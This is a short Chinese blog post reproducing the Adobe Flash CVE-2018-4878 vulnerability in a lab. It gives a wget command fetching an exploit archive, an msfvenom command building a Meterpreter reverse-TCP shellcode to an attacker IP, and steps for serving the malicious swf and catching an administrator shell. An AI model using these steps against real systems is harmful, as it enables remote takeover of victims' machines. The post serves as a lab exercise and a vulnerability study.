Flash CVE-2018-4878漏洞复现

2019-09-24 17:36:46 浏览数 (1)

0x01 前言

Adobe公司在去年2018年2月1日发布了一条安全公告:

https://helpx.adobe.com/security/products/flash-player/apsa18-01.html

公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。

0x02 漏洞影响

Flash Player当前最新版本28.0.0.137以及之前的所有版本

0x03 漏洞复现

环境测试:

攻击机:kali

目标靶机:win7x64 IE8.0 FLASH player28.0.0.137

下载漏洞利用脚本:

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

可以看到漏洞利用的脚本和swf文件:

不过这里我们需要对exp脚本进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。链接是:https://github.com/anbai-inc/CVE-2018-4878

其次,需要修改替换原来的shellcode代码,我们用kali的msf生成shellcode:

kali:192.168.1.197

win7:192.168.1.105

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.197 lport=5678 -f python>shellcode.txt

替换:

将exp脚本放入kali下和index.html同一个目录下,生成恶意的swf文件,注意脚本下生成swf的目录是/opt/CVE-2018-4878,可以自定义修改目录

为了让win7访问恶意文件,我们开启kali的web服务,将swf文件放到www目录下:

在msf下监听:

开始进行监听之后,在win7上用ie打开197的80端口服务:

Shell回显过来了!

管理员权限:

0x04 漏洞修复

升级到最新版本即可

0 人点赞